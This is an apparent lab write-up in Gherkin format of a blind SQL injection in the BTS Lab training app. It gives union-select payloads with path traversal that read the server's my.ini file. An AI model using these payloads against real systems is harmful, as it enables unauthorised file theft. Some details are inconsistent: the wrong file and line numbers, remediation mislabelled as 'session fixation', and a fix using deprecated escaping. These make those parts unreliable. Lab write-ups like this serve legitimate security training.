## Version 1.4.1
## language: en

Feature:
  TOE:
    BTS labev
  Location:
    http://localhost/btslab/vulnerability/sqli/blindsqli.php - id
  Category:
    Web
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in a SQL Command
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
    REQ.105: https://fluidattacks.com/web/rules/105/
  Goal:
    Get system files with blind SQL injection
  Recommendation:
    Sanitize user input.
    Limit the amount of successive wrong queries made by an user.
    Prevent confirmation/error messages when possible.

  Background:
  Hacker's software:
    | <Software name>|    <Version>    |
    | Chromer        | 76.0.3809.132   |
    | Windows        | 10.0.1809 (x64) |
  TOE information:
    Given I am accessing the site http://localhost/btslab/
    And the server is running MariaDB version 10.1.36
    And PHP version 5.6.38
    And Apache version 2.4.34
    And is running on Windows 10 with XAMPP 5.6

  Scenario: Normal use case
    Given I am accessing the site http://localhost/btslab/
    And I can go to the blind SQLi2 challenge
    Then I can see that external HTML is load

  Scenario: Static detection
    Given ToE source code
    When I inspect 'admin.php'
    Then I see the vulnerability is being caused by lines 21 to 2
    """
    12  if(isset($_REQUEST['id']))
    13  {
    14
    15  $result=mysql_query("select page from tdata where id=".$_REQUEST['id']);
    16      $data=@mysql_fetch_array($result);
    17      if($data)
    18      {
    19
    20      include($data['page']);
    21      }
    22  }
    """
    And I notice that there is not protection to SQLi injection
    And "include" function can be dangerous

  Scenario: Dynamic detection
    When I access to "localhost/btslab/vulnerability/sqli/blindsqli.php?id=1"
    Then I try to cause a SQL error but I can't see nothing
    Then I replace the GET request :
    """
    localhost/btslab/vulnerability/sqli/blindsqli.php?id=5124 or 1=1
    """
    And I can see that the page always show me first external page
    Then I notice that I can use SQL injection

  Scenario: Exploitation
    Given I use SQL injection
    When I try to load another page using the next request
    """
      http://localhost/btslab/vulnerability/sqli/blindsqli.php?
      id=124%20union%20select%20"ext2.html"%20page
    """
    Then I notice that it load correctly
    And I can conclude that I can use blind SQL injection

  Scenario: Extraction
    Given I can use blind SQL injection
    Then I try to get a system files with the next request
    """
    http://localhost/btslab/vulnerability/sqli/blindsqli.php?
    id=1232%20union%20select%20%22../../../../mysql/bin/my.ini%22%20page
    """
    And I get "my.ini" file (evidence)[img.png]
    And I conclude that I can extract system files


  Scenario: Remediation
    Given I have patched the session fixation vulnerability using php functions
    """
    mysql_real_escape_string(GET_Request)
    """
    And I add code in 'blindsqli.php' as seen:
    """
    11  if(isset($_REQUEST['id']))
    12  {
    13
    14  $result=mysql_query("select page from tdata where
    id='".mysql_real_escape_string($_REQUEST['id'])."'");
    15      $data=@mysql_fetch_array($result);
    16      if($data)
    17      {
    18
    19      include($data['page']);
    20      }
    21  }
    """
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.0/10 (High) - AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.8/10 (High) - E:P/RL:O/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    8.6/10 (High) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-06
